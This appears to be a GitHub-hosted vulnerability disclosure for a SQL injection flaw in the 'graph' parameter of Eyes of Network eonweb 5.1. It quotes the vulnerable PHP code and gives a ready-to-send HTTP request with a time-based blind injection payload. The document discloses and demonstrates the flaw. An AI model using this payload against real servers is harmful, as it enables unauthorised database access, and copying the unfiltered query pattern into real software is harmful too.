Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Eonweb_module/capacity_per_label/index.php the graph parameter has SQL injection vulnerability
Powered by Shaojie Jiang from 360 SkyEye Labs
version: 5.1
https://github.com/EyesOfNetworkCommunity/eonweb
Vulnerability details
# 0x01
module/capacity_per_graph/index.php Line 41
if(count($_GET)>0){
$error = false;
# --- Retrieve the selected graph id
if(isset($_GET['graph'])){
$graphlocal_graph_id = $_GET['graph'];
module/capacity_per_graph/index.php Line 80
if(isset($graphlocal_graph_id)){
$result_graph= sqlrequest($database_cacti,"SELECT id FROM graph_local WHERE graph_template_id='$graphlocal_graph_id' ");
$nbr_ligne_graph = mysqli_num_rows($result_graph);
for ($i=0;$i<$nbr_ligne_graph;$i++)
$graphlocal_graph_id has not been filtered to cause SQL injection vulnerability
EXP:
GET /module/capacity_per_label/?date=1&submit=Show+graphs&graph=11%27%20and%20sleep(5)%20%23 HTTP/1.1
Host: 192.168.242.131
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://192.168.242.131/module/capacity_per_label/
Cookie: session_id=1016781291; user_name=admin; user_id=1; user_limitation=0; group_id=1; Cacti=29oildver3o6kn7am6vh3d1sq5; pnp4nagios=jstbh8aivjj1eai2ncru3rbnd4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
The page will be delayed for 5 seconds